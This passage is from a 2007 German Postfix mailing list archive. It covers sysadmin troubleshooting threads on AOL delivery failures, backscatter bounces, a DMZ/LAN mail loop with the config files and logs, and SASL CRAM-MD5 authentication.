18/0.13/0.01/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=aol.com type=A: Host not found) Nov 21 18:51:23 cherry postfix/cleanup[12778]: CEA3A8A69: message-id=<20071121175123.CEA3A8A69 at cherry.anup.de> Nov 21 18:51:23 cherry postfix/bounce[12780]: 5871082E6: sender non-delivery notification: CEA3A8A69 ... Ein telnet hingegen funktioniert: # telnet mailin-02.mx.aol.com 25 Trying 64.12.137.89... Connected to mailin-02.mx.aol.com. Escape character is '^]'. 220-rly-ma09.mx.aol.com ESMTP mail_relay_in-ma09.7; Wed, 21 Nov 2007 13:57:25 -0500 220-America Online (AOL) and its affiliated companies do not 220- authorize the use of its proprietary computers and computer 220- networks to accept, transmit, or distribute unsolicited bulk 220- e-mail sent from the internet. Effective immediately: AOL 220- may no longer accept connections from IP addresses which 220 have no reverse-DNS (PTR record) assigned. ehlo anup.de 250-rly-ma09.mx.aol.com cherry.anup.de 250 HELP quit 221 SERVICE CLOSING CHANNEL Connection closed by foreign host. Was habe ich für ein Problem? Hilft da nur das logging aufdrehen? -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: http://gpg-keyserver.de/pks/lookup?search=anmeyer&fingerprint=on&op=index From mrg at unimx.de Wed Nov 21 20:52:59 2007 From: mrg at unimx.de (mrg at unimx.de) Date: Wed, 21 Nov 2007 20:52:59 +0100 Subject: [Postfixbuch-users] Backscatter / Bounces (ja schonwieder) Message-ID: <0d1901c82c78$1eca2100$5c5e6300$@de> Hallo, ihr seit es ev. leid antworten über Backscatter zu geben. Bevor ihr nölt: Mein Server ist durch ?smtpd-Restrictions? schon etwas gegen Backscatter geschützt. Habe auch einige Howtos und Backscatter Infos gelesen die im Netz so zu finden sind. Weiß also etwas bescheid. Folgendes Szenario (ist exemplarisch, lässt sich auch auf andere BEREICHE portieren): Ein User auf meinem System sein Postfach ist voll. [anderer BEREICH: z.B. eine Weiterleitung eingerichtet die nicht mehr existiert, Mails mit ?fi..en? reject , Abwesenheitsbenachtigung] Dieser User bekommt nun von einem geforgten Absender Spam-Post: forget at sender.tld -> meinuser at meinedomain.de Per ?smtpd-Restrictions? ist diese Mail nicht ablehnbar, solange forget at sender.tld tatsächlich existiert. Weg der Mail: SMTP -> a) Spamfilter (markiert den Header da ja Spam (keine Vernichtung der Mail) ) -> Cyrus will einliefern an meinuser at meinedomain.de und sieht Postfach voll -> Mail wird gebounced mit Postfach voll So da haben wir den Salat. forget at sender.tld bekommt tausende Bounce (typischer Backscatter). Ist es nun nicht möglich, dass Mails die von MAILER-DAEMON at MYHOST (Mail Delivery System) oder Mail Sieve Subsystem an jemanden geschickt werden UND! - im Inhalt die Spammarkierung enthalten (da ja eigentliche Mail angehängt die gefilter wurde) => per Filter auf den schon vorhanden Spamheader (oder wie auch immer) abzulehnen (oder z.B. an ein Sammelpostfach senden)? Es würden alle gebounced Mails die die Spammarkierung haben aussortiert/wegsortiert. Das würde doch das Problem lösen, da nun kein Bounce auf eigentliche Spammails gesendet wird? Wie kann ich das bewerkstelligen? Wie sieht der Weg einer SIEVE gefilterten Mail im Postfixsystem aus (ist ja kein eigentlicher Bounce). Hinweis: Was nicht praktikabel ist, ist die Spammails unter a) nicht nur zu markieren sondern zu löschen. Meine User wollen die Spams mir markierung (werden dann per Sieve in Spamordner gepackt). Auch nicht praktikabel ist so Spam im SMTP Dialog abzulehnen (verschiedene Gründe ua. Sie oben). Bin für jede Hinweise dankbar Martin -------------- nächster Teil -------------- Ein Dateianhang mit HTML-Daten wurde abgetrennt... URL: From new_zealand at gmx.de Wed Nov 21 21:17:04 2007 From: new_zealand at gmx.de (Tanja Moeser) Date: Wed, 21 Nov 2007 21:17:04 +0100 Subject: [Postfixbuch-users] =?iso-8859-15?q?Empf=E4nger_erh=E4lt_Mail_meh?= =?iso-8859-15?q?rfach=2C_Sender_bekommt_554?= Message-ID: <349266838@web.de> Hallo Liste, ich habe hier seit heute ein ziemlich merkwürdiges Problem. Wenn ein Empänger eine Mail erhält, ist dieselbe Mail mehrfach im Posteingang?! Aber der Sender bekommt trotzdem eine "Undelivered Mail Returned to Sender" Nachricht mit dem Hinweis: : host 127.0.0.1[127.0.0.1] said: 554 5.6.0 Failed, id=09199-01, from MTA([127.0.0.1]:10025): 554 5.4.0 Error: too many hops (in reply to end of DATA command) Ich nutze einen Postfix in der DMZ und einen im internen LAN. Hier die Logs -> Interner Server Nov 21 20:40:20 mail postfix/smtpd[3120]: connect from unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/smtpd[3120]: 2D5ABD0054: client=unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/cleanup[3122]: 2D5ABD0054: message-id=<349251783 at web.de> Nov 21 20:40:20 mail postfix/qmgr[1474]: 2D5ABD0054: from=, size=1805, nrcpt=2 (queue active) Nov 21 20:40:20 mail postfix/smtpd[3120]: disconnect from unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/virtual[3123]: 2D5ABD0054: to=, orig_to=, relay=virtual, delay=0.05, delays=0.03/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to maildir) Nov 21 20:40:20 mail postfix/smtp[3125]: 2D5ABD0054: to=, relay=192.168.3.2[192.168.3.2]:25, delay=0.12, delays=0.03/0.01/0.06/0.02, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 7337641C408) Nov 21 20:40:20 mail postfix/qmgr[1474]: 2D5ABD0054: removed Nov 21 20:40:20 mail postfix/smtpd[3120]: connect from unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/smtpd[3120]: 772B2D0054: client=unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/cleanup[3122]: 772B2D0054: message-id=<349251783 at web.de> Nov 21 20:40:20 mail postfix/smtpd[3120]: disconnect from unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/qmgr[1474]: 772B2D0054: from=, size=2605, nrcpt=2 (queue active) Nov 21 20:40:20 mail postfix/virtual[3123]: 772B2D0054: to=, orig_to=, relay=virtual, delay=0.02, delays=0.02/0/0/0, dsn=2.0.0, status=sent (delivered to maildir) Nov 21 20:40:20 mail postfix/smtp[3125]: 772B2D0054: to=, relay=192.168.3.2[192.168.3.2]:25, delay=0.09, delays=0.02/0/0.05/0.02, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as B9C8B41C408) Nov 21 20:40:20 mail postfix/qmgr[1474]: 772B2D0054: removed Nov 21 20:40:23 mail postfix/smtpd[3120]: connect from unknown[192.168.3.2] Nov 21 20:40:23 mail postfix/smtpd[3120]: E757DD0054: client=unknown[192.168.3.2] Nov 21 20:40:23 mail postfix/smtpd[3120]: disconnect from unknown[192.168.3.2] *snip* Log aus der DMZ (192.168.3.2) Nov 21 20:42:18 proxy postfix/smtp[9629]: 7325941C409: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.17, delays=0.05/0/0.06/0.07, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 5BD51D0054) Nov 21 20:42:18 proxy postfix/qmgr[9159]: 7325941C409: removed Nov 21 20:42:18 proxy postfix/smtpd[9619]: connect from unknown[192.168.1.7] Nov 21 20:42:18 proxy postfix/smtpd[9619]: A9CE941C408: client=unknown[192.168.1.7] Nov 21 20:42:18 proxy postfix/cleanup[9623]: A9CE941C408: message-id=<349251783 at web.de> Nov 21 20:42:18 proxy postfix/qmgr[9159]: A9CE941C408: from=, size=5185, nrcpt=1 (queue active) Nov 21 20:42:18 proxy postfix/smtpd[9619]: disconnect from unknown[192.168.1.7] Nov 21 20:42:18 proxy postfix/smtpd[9628]: connect from localhost[127.0.0.1] Nov 21 20:42:18 proxy postfix/smtpd[9628]: D018741C409: client=localhost[127.0.0.1] Nov 21 20:42:18 proxy postfix/cleanup[9623]: D018741C409: message-id=<349251783 at web.de> Nov 21 20:42:18 proxy postfix/qmgr[9159]: D018741C409: from=, size=5626, nrcpt=1 (queue active) Nov 21 20:42:18 proxy postfix/smtpd[9628]: disconnect from localhost[127.0.0.1] Nov 21 20:42:18 proxy amavis[9199]: (09199-04) Passed CLEAN, [87.139.125.198] -> , Message-ID: <349251783 at web.de>, mail_id: m0Vq23ZVHEfV, Hits: 1.113, 168 ms Nov 21 20:42:18 proxy postfix/smtp[9624]: A9CE941C408: to=, relay=127.0.0.1[127.0.0.1]:10024, delay=0.24, delays=0.06/0/0/0.17, dsn=2.6.0, status=sent (250 2.6.0 Ok, id=09199-04, from MTA([127.0.0.1]:10025): 250 2.0.0 Ok: queued as D018741C409) Nov 21 20:42:18 proxy postfix/qmgr[9159]: A9CE941C408: removed Nov 21 20:42:19 proxy postfix/smtp[9629]: D018741C409: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.16, delays=0.07/0/0.06/0.04, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as BDB78D0054) Nov 21 20:42:19 proxy postfix/qmgr[9159]: D018741C409: removed Nov 21 20:42:19 proxy postfix/smtpd[9619]: connect from unknown[192.168.1.7] Nov 21 20:42:19 proxy postfix/smtpd[9619]: 11C4241C408: client=unknown[192.168.1.7] Nov 21 20:42:19 proxy postfix/cleanup[9623]: 11C4241C408: message-id=<349251783 at web.de> Nov 21 20:42:19 proxy postfix/qmgr[9159]: 11C4241C408: from=, size=5985, nrcpt=1 (queue active) Nov 21 20:42:19 proxy postfix/smtpd[9628]: disconnect from localhost[127.0.0.1] Nov 21 20:42:19 proxy amavis[9201]: (09201-04) Passed CLEAN, [87.139.125.198] -> , Message-ID: <349251783 at web.de>, mail_id: lgK8NUJITaDT, Hits: 1.113, 160 ms Nov 21 20:42:19 proxy postfix/smtp[9624]: 11C4241C408: to=, relay=127.0.0.1[127.0.0.1]:10024, delay=0.18, delays=0.02/0/0/0.16, dsn=2.6.0, status=sent (250 2.6.0 Ok, id=09201-04, from MTA([127.0.0.1]:10025): 250 2.0.0 Ok: queued as 2CC9241C409) Nov 21 20:42:19 proxy postfix/qmgr[9159]: 11C4241C408: removed Nov 21 20:42:21 proxy postfix/smtp[9629]: 04CA741C409: to=, relay=192.168.1.7[192.168.1.7]:25, delay=0.13, delays=0.06/0/0.07/0, dsn=5.4.0, status=bounced (host 192.168.1.7[192.168.1.7] said: 554 5.4.0 Error: too many hops (in reply to end of DATA command)) Nov 21 20:42:21 proxy postfix/cleanup[9623]: 2D1FC41C40A: message-id=<20071121194221.2D1FC41C40A at proxy.local> Nov 21 20:42:21 proxy postfix/qmgr[9159]: 2D1FC41C40A: from=<>, size=12265, nrcpt=1 (queue active) Nov 21 20:42:21 proxy postfix/bounce[9642]: 04CA741C409: sender non-delivery notification: 2D1FC41C40A Nov 21 20:42:21 proxy postfix/qmgr[9159]: 04CA741C409: removed Nov 21 20:42:22 proxy postfix/smtp[9629]: 2D1FC41C40A: to=, relay=mx0.gmx.net[213.165.64.100]:25, delay=1.3, delays=0.02/0/0.55/0.76, dsn=2.6.0, status=sent (250 2.6.0 Message accepted {mx057}) Nov 21 20:42:22 proxy postfix/qmgr[9159]: 2D1FC41C40A: removed *snip* ---> Hier noch die main.cf aus dem LAN: smtpd_banner = mail.meineDomain.de ESMTP biff = no append_dot_mydomain = no inet_interface = all myhostname = mail.local mydestination = relayhost = [192.168.3.2] #mynetworks_style = host mynetworks = 127.0.0.0/8, localhost, 192.168.3.2 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all local_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf home_mailbox = /Maildir virtual_transport = virtual local_transport = virtual virtual_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf virtual_alias_maps = ldap:/etc/postfix/ldap_alias.cf virtual_mailbox_maps = ldap:/etc/postfix/ldap_dir.cf virtual_uid_maps = ldap:/etc/postfix/ldap_uid.cf virtual_gid_maps = ldap:/etc/postfix/ldap_gid.cf virtual_mailbox_domains= ldap:/etc/postfix/ldap_domain.cf virtual_mailbox_base = / virtual_minimum_uid = 500 virtual_mailbox_limit = 0 --> Main.cf aus der DMZ: smtpd_banner = mail.meineDomain.de ESMTP biff = no debug_peer_level = 4 append_dot_mydomain = no transport_maps = hash:/etc/postfix/transport relay_recipient_maps = hash:/etc/postfix/relay_recipients myhostname = proxy.local alias_maps = hash:/etc/aliases alias_database = hash:/etc/aliases myorigin = meineDomain.de mydestination = proxy.local, mail.local relayhost = relay_domains = meineDomain1, meineDomain2 defer_transports = mailbox_transport = mynetworks = 127.0.0.0/8, 192.168.1.0/24 mailbox_command = mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all inet_protocols = all smtpd_sasl_local_domain = smtpd_sasl_auth_enable = yes smtpd_sasl_security_options = noanonymous broken_sasl_auth_clients = yes smtpd_recipient_restrictions = permit_sasl_authenticated, permit_mynetworks, reject_unauth_destination, reject_unknown_recipient_domain smtpd_sasl_authenticated_header = yes #TLS smtpd_use_tls=yes smtpd_tls_session_cache_database = btree:${queue_directory}/smtpd_scache smtp_tls_session_cache_database = btree:${queue_directory}/smtp_scache smtpd_tls_key_file = /etc/postfix/server.key smtpd_tls_cert_file = /etc/postfix/server.crt smtpd_tls_loglevel = 3 smtpd_tls_received_header = yes smtpd_tls_session_cache_timeout = 3600s tls_random_source = dev:/dev/urandom masquerade_exceptions = root masquerade_classes = envelope_sender, header_sender, header_recipient program_directory = /usr/lib/postfix masquerade_domains = disable_dns_lookups = no default_transport = smtp soft_bounce = no content_filter = smtp-amavis:[127.0.0.1]:10024 Vorab Danke und Gruß, Tanja _____________________________________________________________________ Der WEB.DE SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! http://smartsurfer.web.de/?mc=100071&distributionid=000000000066 From cite at incertum.net Wed Nov 21 21:45:18 2007 From: cite at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Wed, 21 Nov 2007 21:45:18 +0100 Subject: [Postfixbuch-users] =?utf-8?q?Empf=C3=A4nger_erh=C3=A4lt_Mail_meh?= =?utf-8?q?rfach=2C_Sender_bekommt_554?= In-Reply-To: <349266838@web.de> References: <349266838@web.de> Message-ID: <20071121204518.GK11675@mail.incertum.net> * Tanja Moeser wrote: > Nov 21 20:40:20 mail postfix/smtpd[3120]: 2D5ABD0054: client=unknown[192.168.3.2] > Nov 21 20:40:20 mail postfix/cleanup[3122]: 2D5ABD0054: message-id=<349251783 at web.de> > Nov 21 20:40:20 mail postfix/qmgr[1474]: 2D5ABD0054: from=, size=1805, nrcpt=2 (queue active) > Nov 21 20:40:20 mail postfix/smtpd[3120]: disconnect from unknown[192.168.3.2] > Nov 21 20:40:20 mail postfix/virtual[3123]: 2D5ABD0054: to=, orig_to=, relay=virtual, delay=0.05, delays=0.03/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to maildir) > Nov 21 20:40:20 mail postfix/smtp[3125]: 2D5ABD0054: to=, relay=192.168.3.2[192.168.3.2]:25, delay=0.12, delays=0.03/0.01/0.06/0.02, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 7337641C408) > Nov 21 20:40:20 mail postfix/qmgr[1474]: 2D5ABD0054: removed Also abgesehen davon, daß es ziemlich hilfreich gewesen wäre, wenn die Logs wirklich von der selben Schleife (Du hast da ein Talent für, oder? *g*) gewesen wären, hier mal mein "buest guess", auf den ich aber diesmal nicht wetten würde: Es wird tanja.moeser at meineDomain.de irgendwie auf "tam at mail.local" umgeschrieben. Eine Kopie davon wird via virtual-Transport korrekt in ein Maildir gekippt (tam at mail.local), danach wird aber tanja.moeser at meineDomain.de nicht als Adresse erkannt, für die der Server im LAN zuständig ist, und eine Kopie davon erneut an den Server in der DMZ zugestellt etc. pp. Ich tippe auf: ldap_alias.cf - da wirds wohl irgendwie umgeschrieben und dabei verdoppelt. Genauere Logs wären hier hilfreich, also z.B. $ postconf -e debug_peer_list=192.168.3.2 $ postfix reload (gefolgt von erneuter Zustellung) Ebenso interesant: for map in ldap_mbox.cf ldap_alias.cf ldap_dir.cf ldap_uid.cf ldap_gid.cf ldap_domain.cf; do postmap -q tanja.moeser at meineDomain.de ldap:/etc/postfix/$map done Falls jemand, der Ahnung von LDAP hat, hier vortreten und mal sagen möchte, wie man sowas richtig debuggt, dann würde der- oder diejenige von mir gerne auf ein Bier eingeladen werden. Ciao Stefan -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #81: Cursor-Tasten - Neumodischer Schnickschnack. (Gert Döring) From ml at awinkelmann.de Wed Nov 21 21:47:19 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Wed, 21 Nov 2007 21:47:19 +0100 Subject: [Postfixbuch-users] =?iso-8859-1?q?Empf=E4nger_erh=E4lt_Mail_mehr?= =?iso-8859-1?q?fach=2C_Sender_bekommt_554?= In-Reply-To: <349266838@web.de> References: <349266838@web.de> Message-ID: <200711212147.19532.ml@awinkelmann.de> On Mittwoch, 21. November 2007, Tanja Moeser wrote: > ich habe hier seit heute ein ziemlich merkwürdiges Problem. > Wenn ein Empänger eine Mail erhält, ist dieselbe Mail mehrfach im > Posteingang?! Aber der Sender bekommt trotzdem eine "Undelivered Mail > Returned to Sender" Nachricht mit dem Hinweis: > : host 127.0.0.1[127.0.0.1] said: 554 5.6.0 > Failed, id=09199-01, from MTA([127.0.0.1]:10025): 554 5.4.0 Error: too many > hops (in reply to end of DATA command) Du hast einen Loop konfiguriert. > Ich nutze einen Postfix in der DMZ und einen im internen LAN. > > Hier die Logs -> Interner Server > Nov 21 20:40:20 mail postfix/smtpd[3120]: connect from unknown[192.168.3.2] > Nov 21 20:40:20 mail postfix/smtpd[3120]: 2D5ABD0054: > client=unknown[192.168.3.2] > Nov 21 20:40:20 mail postfix/cleanup[3122]: 2D5ABD0054: > message-id=<349251783 at web.de> > Nov 21 20:40:20 mail postfix/qmgr[1474]: 2D5ABD0054: > from=, size=1805, nrcpt=2 (queue active) Eine Mail an zwei Empfänger. > Nov 21 20:40:20 mail postfix/smtpd[3120]: disconnect > from unknown[192.168.3.2] > Nov 21 20:40:20 mail postfix/virtual[3123]: 2D5ABD0054: to=, > orig_to=, relay=virtual, delay=0.05, > delays=0.03/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to maildir) Einer geht an virtual und wird lokal ausgeliefert. > Nov 21 20:40:20 mail postfix/smtp[3125]: 2D5ABD0054: > to=, relay=192.168.3.2[192.168.3.2]:25, > delay=0.12, delays=0.03/0.01/0.06/0.02, dsn=2.0.0, status=sent (250 2.0.0 > Ok: queued as 7337641C408) Einer geht in die DMZ und kommt vermutlich von dort wieder zurück. > Nov 21 20:40:20 mail postfix/qmgr[1474]: 2D5ABD0054: removed > Nov 21 20:40:20 mail postfix/smtpd[3120]: connect from unknown[192.168.3.2] > Nov 21 20:40:20 mail postfix/smtpd[3120]: 772B2D0054: > client=unknown[192.168.3.2] Nov 21 20:40:20 mail postfix/cleanup[3122]: > 772B2D0054: message-id=<349251783 at web.de> Nov 21 20:40:20 mail > postfix/smtpd[3120]: disconnect from unknown[192.168.3.2] Nov 21 20:40:20 > mail postfix/qmgr[1474]: 772B2D0054: from=, size=2605, > nrcpt=2 (queue active) Nov 21 20:40:20 mail postfix/virtual[3123]: > 772B2D0054: to=, orig_to=, > relay=virtual, delay=0.02, delays=0.02/0/0/0, dsn=2.0.0, status=sent > (delivered to maildir) Nov 21 20:40:20 mail postfix/smtp[3125]: 772B2D0054: > to=, relay=192.168.3.2[192.168.3.2]:25, > delay=0.09, delays=0.02/0/0.05/0.02, dsn=2.0.0, status=sent (250 2.0.0 Ok: > queued as B9C8B41C408) Nov 21 20:40:20 mail postfix/qmgr[1474]: 772B2D0054: > removed > Nov 21 20:40:23 mail postfix/smtpd[3120]: connect from unknown[192.168.3.2] > Nov 21 20:40:23 mail postfix/smtpd[3120]: E757DD0054: > client=unknown[192.168.3.2] Nov 21 20:40:23 mail postfix/smtpd[3120]: > disconnect from unknown[192.168.3.2] *snip* > > Log aus der DMZ (192.168.3.2) > ---> Hier noch die main.cf aus dem LAN: > smtpd_banner = mail.meineDomain.de ESMTP > biff = no > append_dot_mydomain = no > inet_interface = all > myhostname = mail.local > mydestination = > relayhost = [192.168.3.2] > #mynetworks_style = host > mynetworks = 127.0.0.0/8, localhost, 192.168.3.2 Was ist localhost bei Dir und wieso steht es trotz 127.0.0.0/8 dort? > mailbox_size_limit = 0 > recipient_delimiter = + > inet_interfaces = all > local_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf Ist ohne mydestination ziemlicher Unsinn. > home_mailbox = /Maildir > virtual_transport = virtual Das dürfte default sein und ist in der main.cf nutzlos. > local_transport = virtual ebenfalls Unsinnig. > virtual_recipient_maps = ldap:/etc/postfix/ldap_mbox.cf Das gibt es nicht. > virtual_alias_maps = ldap:/etc/postfix/ldap_alias.cf Was ergibt: # postmap -q tanja.moeser at meineDomain.de ldap:/etc/postfix/ldap_alias.cf > virtual_mailbox_maps = ldap:/etc/postfix/ldap_dir.cf > virtual_uid_maps = ldap:/etc/postfix/ldap_uid.cf > virtual_gid_maps = ldap:/etc/postfix/ldap_gid.cf > virtual_mailbox_domains= ldap:/etc/postfix/ldap_domain.cf > virtual_mailbox_base = / > virtual_minimum_uid = 500 > virtual_mailbox_limit = 0 Bitte das nächste mal die Ausgabe von "postconf -n" - wie vermutlich bereits tausend mal hier erwähnt. > --> Main.cf aus der DMZ: -- Andreas From ml at awinkelmann.de Wed Nov 21 21:52:40 2007 From: ml at awinkelmann.de (Andreas Winkelmann) Date: Wed, 21 Nov 2007 21:52:40 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <20071121200759.7f4d5673@gamma.meyer.home> References: <20071121200759.7f4d5673@gamma.meyer.home> Message-ID: <200711212152.40288.ml@awinkelmann.de> On Mittwoch, 21. November 2007, Andreas Meyer wrote: > Kann mir jemand auf die Sprünge helfen. Ich kann keine mail an einen > Teilnehmer von aol.com zustellen. "keine" stimmt wohl nicht ganz. > Nov 21 18:48:01 cherry postfix/smtpd[12725]: connect from > delta.anup.dmz[192.168.20.60] Nov 21 18:48:01 cherry postfix/smtpd[12725]: > setting up TLS connection from delta.anup.dmz[192.168.20.60] Nov 21 > 18:48:02 cherry postfix/smtpd[12725]: > fingerprint=8F:AF:F4:A9:19:67:89:5C:79:37:FD:45:C0:76:EA:4A Nov 21 18:48:02 > cherry postfix/smtpd[12725]: Verified: subject_CN=delta.anup.dmz, > issuer=CA-anup.de Nov 21 18:48:02 cherry postfix/smtpd[12725]: TLS > connection established from delta.anup.dmz[192.168.20.60]: TL Sv1 with > cipher EDH-RSA-DES-CBC3-SHA (168/168 bits) > Nov 21 18:48:02 cherry postfix/smtpd[12725]: 97EA082E6: > client=delta.anup.dmz[192.168.20.60] Nov 21 18:48:02 cherry > postfix/cleanup[12729]: 97EA082E6: > message-id=<20071121174742.A200C17908D at delta.anup.dm z> > Nov 21 18:48:02 cherry postfix/qmgr[6978]: 97EA082E6: > from=, size=1574, nrcpt=1 (queue acti ve) > Nov 21 18:48:02 cherry postfix/smtpd[12725]: disconnect from > delta.anup.dmz[192.168.20.60] Nov 21 18:48:08 cherry postfix/smtp[12730]: > 97EA082E6: lost connection with mailin-02.mx.aol.com[64.12.137.168 ] while > receiving the initial server greeting > Nov 21 18:48:09 cherry postfix/smtp[12730]: 97EA082E6: > to=, relay=mailin-03.mx.aol.com[64.12. 138.153]:25, > delay=7.5, delays=0.14/0.13/6.1/1.1, dsn=2.0.0, status=sent (250 OK) "status=sent" bedeutet sie ist angenommen worden. > Nov 21 18:48:09 cherry postfix/qmgr[6978]: 97EA082E6: removed > Nov 21 18:51:23 cherry postfix/smtpd[12775]: connect from > delta.anup.dmz[192.168.20.60] Nov 21 18:51:23 cherry postfix/smtpd[12775]: > setting up TLS connection from delta.anup.dmz[192.168.20.60] Nov 21 > 18:51:23 cherry postfix/smtpd[12775]: > fingerprint=8F:AF:F4:A9:19:67:89:5C:79:37:FD:45:C0:76:EA:4A Nov 21 18:51:23 > cherry postfix/smtpd[12775]: Verified: subject_CN=delta.anup.dmz, > issuer=CA-anup.de Nov 21 18:51:23 cherry postfix/smtpd[12775]: TLS > connection established from delta.anup.dmz[192.168.20.60]: TL Sv1 with > cipher EDH-RSA-DES-CBC3-SHA (168/168 bits) > Nov 21 18:51:23 cherry postfix/smtpd[12775]: 5871082E6: > client=delta.anup.dmz[192.168.20.60] Nov 21 18:51:23 cherry > postfix/cleanup[12778]: 5871082E6: > message-id=<20071121175105.D8D6D17908D at delta.anup.dm z> > Nov 21 18:51:23 cherry postfix/qmgr[6978]: 5871082E6: > from=, size=3520, nrcpt=1 (queue acti ve) > Nov 21 18:51:23 cherry postfix/smtpd[12775]: disconnect from > delta.anup.dmz[192.168.20.60] > Nov 21 18:51:23 cherry postfix/smtp[12779]: > 5871082E6: to=, relay=none, delay=0.32, delays=0. > 18/0.13/0.01/0, dsn=5.4.4, status=bounced (Host or domain name not found. > Name service error for name=aol.com type=A: Host not found) Er findet keinen a-Record zu aol.com. Mal beiseite gemnommen, dass es merkwürdig ist, dass er das überhaupt versucht, sieht es danach aus, dass Du DNS-Probleme hast. Prüf das mal. Hast Du einen DNS-Server? > Nov 21 18:51:23 cherry postfix/cleanup[12778]: CEA3A8A69: > message-id=<20071121175123.CEA3A8A69 at cherry.anup.de> Nov 21 18:51:23 cherry > postfix/bounce[12780]: 5871082E6: sender non-delivery notification: > CEA3A8A69 ... > > Ein telnet hingegen funktioniert: > > # telnet mailin-02.mx.aol.com 25 > Trying 64.12.137.89... > Connected to mailin-02.mx.aol.com. > Escape character is '^]'. > 220-rly-ma09.mx.aol.com ESMTP mail_relay_in-ma09.7; Wed, 21 Nov 2007 > 13:57:25 -0500 220-America Online (AOL) and its affiliated companies do not > 220- authorize the use of its proprietary computers and computer > 220- networks to accept, transmit, or distribute unsolicited bulk > 220- e-mail sent from the internet. Effective immediately: AOL > 220- may no longer accept connections from IP addresses which > 220 have no reverse-DNS (PTR record) assigned. > ehlo anup.de > 250-rly-ma09.mx.aol.com cherry.anup.de > 250 HELP > quit > 221 SERVICE CLOSING CHANNEL > Connection closed by foreign host. Hast Du das mehrmals probiert? Evtl. ist was überlastet. > Was habe ich für ein Problem? Hilft da nur das logging aufdrehen? -- Andreas From postfix-buch.ml at michawinter.de Wed Nov 21 22:15:39 2007 From: postfix-buch.ml at michawinter.de (Michael Winter) Date: Wed, 21 Nov 2007 22:15:39 +0100 Subject: [Postfixbuch-users] CRAM-MD5-Authentifizierung bei authdaemond klappt nicht In-Reply-To: <200711210630.48950.ml@awinkelmann.de> References: <474369CD.60401@michawinter.de> <200711210630.48950.ml@awinkelmann.de> Message-ID: <47449FFB.4050305@michawinter.de> Andreas Winkelmann wrote: > Bei Cyrus-SASL funktioniert bei Verwendung von saslauthd oder authdaemond nur > PLAIN oder LOGIN. Alle *-MD5 Mechanismen funktionieren nur mit auxprop (und > Passwörtern im Klartext). Dankeschön, funktioniert. > Das ist sicher schon hunderte male durch alle Listen gegangen. Mit welchen Suchbegriffen hätte ich das gefunden? -Michael From anmeyer at anup.de Wed Nov 21 22:27:10 2007 From: anmeyer at anup.de (Andreas Meyer) Date: Wed, 21 Nov 2007 22:27:10 +0100 Subject: [Postfixbuch-users] aol.com connection Problem In-Reply-To: <200711212152.40288.ml@awinkelmann.de> References: <20071121200759.7f4d5673@gamma.meyer.home> <200711212152.40288.ml@awinkelmann.de> Message-ID: <20071121222710.5e434d97@gamma.meyer.home> Andreas Winkelmann schrieb: > > Nov 21 18:51:23 cherry postfix/smtp[12779]: > > 5871082E6: to=, relay=none, delay=0.32, delays=0. > > 18/0.13/0.01/0, dsn=5.4.4, status=bounced (Host or domain name not found. > > Name service error for name=aol.com type=A: Host not found) > > Er findet keinen a-Record zu aol.com. Mal beiseite gemnommen, dass es > merkwürdig ist, dass er das überhaupt versucht, sieht es danach aus, dass Du > DNS-Probleme hast. Prüf das mal. Hast Du einen DNS-Server? Das mit dem a-Record hat mich auch verwundert. Mein Mailserver, das unbekannte Wesen. Was veranlaßt Postfix auf einen A-Record zu prüfen? Ja, ich habe einen eigenen DNS-Server, der die Root-Server befragt. > > Ein telnet hingegen funktioniert: > > > > # telnet mailin-02.mx.aol.com 25 > > Trying 64.12.137.89... > > Connected to mailin-02.mx.aol.com. > > Escape character is '^]'. > > 220-rly-ma09.mx.aol.com ESMTP mail_relay_in-ma09.7; Wed, 21 Nov 2007 > > 13:57:25 -0500 220-America Online (AOL) and its affiliated companies do not > > 220- authorize the use of its proprietary computers and computer > > 220- networks to accept, transmit, or distribute unsolicited bulk > > 220- e-mail sent from the internet. Effective immediately: AOL > > 220- may no longer accept connections from IP addresses which > > 220 have no reverse-DNS (PTR record) assigned. > > ehlo anup.de > > 250-rly-ma09.mx.aol.com cherry.anup.de > > 250 HELP > > quit > > 221 SERVICE CLOSING CHANNEL > > Connection closed by foreign host. > > Hast Du das mehrmals probiert? Evtl. ist was überlastet. mailin-02.mx.aol.com connected manchmal und manchmal schließt er gleich wieder die Verbindung, das macht mailin-03.mx.aol.com nicht: # telnet mailin-02.mx.aol.com 25 Trying 64.12.137.89... Connected to mailin-02.mx.aol.com. Escape character is '^]'. 220-rly-ma06.mx.aol.com ESMTP mail_relay_in-ma06.7; Wed, 21 Nov 2007 16:18:50 -0400 220-America Online (AOL) and its affiliated companies do not 220- authorize the use of its proprietary computers and computer 220- networks to accept, transmit, or distribute unsolicited bulk 220- e-mail sent from the internet. Effective immediately: AOL 220- may no longer accept connections from IP addresses which 220 have no reverse-DNS (PTR record) assigned. quit 221 SERVICE CLOSING CHANNEL Connection closed by foreign host. # telnet mailin-02.mx.aol.com 25 Trying 64.12.137.168... Connected to mailin-02.mx.aol.com. Escape character is '^]'. Connection closed by foreign host. -- Andreas Meyer Mein öffentlicher GPG-Schlüssel unter: 